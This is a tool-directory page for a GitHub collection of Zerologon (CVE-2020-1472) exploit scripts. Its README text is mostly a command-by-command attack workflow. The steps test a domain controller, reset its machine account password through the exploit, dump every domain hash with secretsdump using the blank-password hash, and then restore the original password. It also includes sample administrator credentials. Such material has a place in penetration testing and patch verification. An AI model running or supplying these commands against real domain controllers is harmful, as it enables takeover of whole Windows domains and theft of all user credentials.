Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2020-1472_Tool-collection — cve-2020-1472_Tool collection | Kitploit
Tools/GitHubGitHub/0xcccc666/cve-2020-1472_tool-collection
Password CrackingPrivilege EscalationVulnerability AnalysisExploitationPost-ExploitationPenetration Testing
GitHub0xcccc666/cve-2020-1472_tool-collection

cve-2020-1472_Tool-collection

cve-2020-1472_Tool collection

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
2255 years agoNot yet reviewed

Introduction article

https://www.yuque.com/shamo-vs4ia/vul/ktduf8

Environmental preparation

pip3 install -r requirements.txt

Vulnerability detection

python3 zerologon_tester.py ad ad_ip

image.png

Exploit

python CVE-2020-1472.py AD AD$ adip image.png

secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'god.org/[email protected]' image.png image.png

Successfully exported all hashes

Query hash

before: secretsdump.py god.org/administrator:Admin12345@ad_ip -just-dc-user 'AD$'

image.png

after: secretsdump.py god.org/administrator:Admin12345@ad_ip -just-dc-user 'AD$'

image.png

restore password

python3 reinstall_original_pw.py ad_hostname ad_ip哈希 image.png

Collected from

https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472

https://github.com/risksense/zerologon

https://github.com/VoidSec/CVE-2020-1472

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/SecuraBV/CVE-2020-1472

Download Tool